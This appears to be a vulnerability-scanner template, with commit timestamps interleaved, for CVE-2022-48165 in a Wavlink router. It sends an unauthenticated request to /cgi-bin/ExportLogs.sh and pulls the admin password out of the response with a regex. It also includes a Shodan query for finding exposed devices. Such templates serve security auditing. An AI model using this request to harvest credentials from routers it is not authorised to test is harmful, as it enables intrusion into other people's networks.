2023-02-06 12:45:15 +00:00
id : CVE-2022-48165
info :
2023-04-10 18:36:50 +00:00
name : Wavlink - Improper Access Control
2023-02-06 12:45:15 +00:00
author : For3stCo1d
severity : high
description : |
2023-04-10 18:36:50 +00:00
Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.
2023-02-06 12:45:15 +00:00
reference :
- https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE
- https://twitter.com/For3stCo1d/status/1622576544190464000
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165
- https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md
2023-04-10 18:36:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-48165
2023-03-02 10:57:29 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2022-48165
2023-04-10 20:47:10 +00:00
cwe-id : CWE-284
2023-07-11 19:49:27 +00:00
epss-score : 0.08683
cpe : cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:*
2023-02-06 12:45:15 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-02-07 04:13:27 +00:00
shodan-query : http.favicon.hash:-1350437236
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : wavlink
product : wl-wn530h4_firmware
2023-02-06 12:45:15 +00:00
tags : cve,cve2022,wavlink,router,exposure
2023-04-27 04:28:59 +00:00
http :
2023-02-07 04:13:27 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/ExportLogs.sh"
2023-02-06 12:45:15 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'Password='
- 'Login='
condition : and
- type : word
part : header
words :
- filename="sysLogs.txt"
- type : status
status :
- 200
extractors :
- type : regex
regex :
- 'Password=([^\s]+)'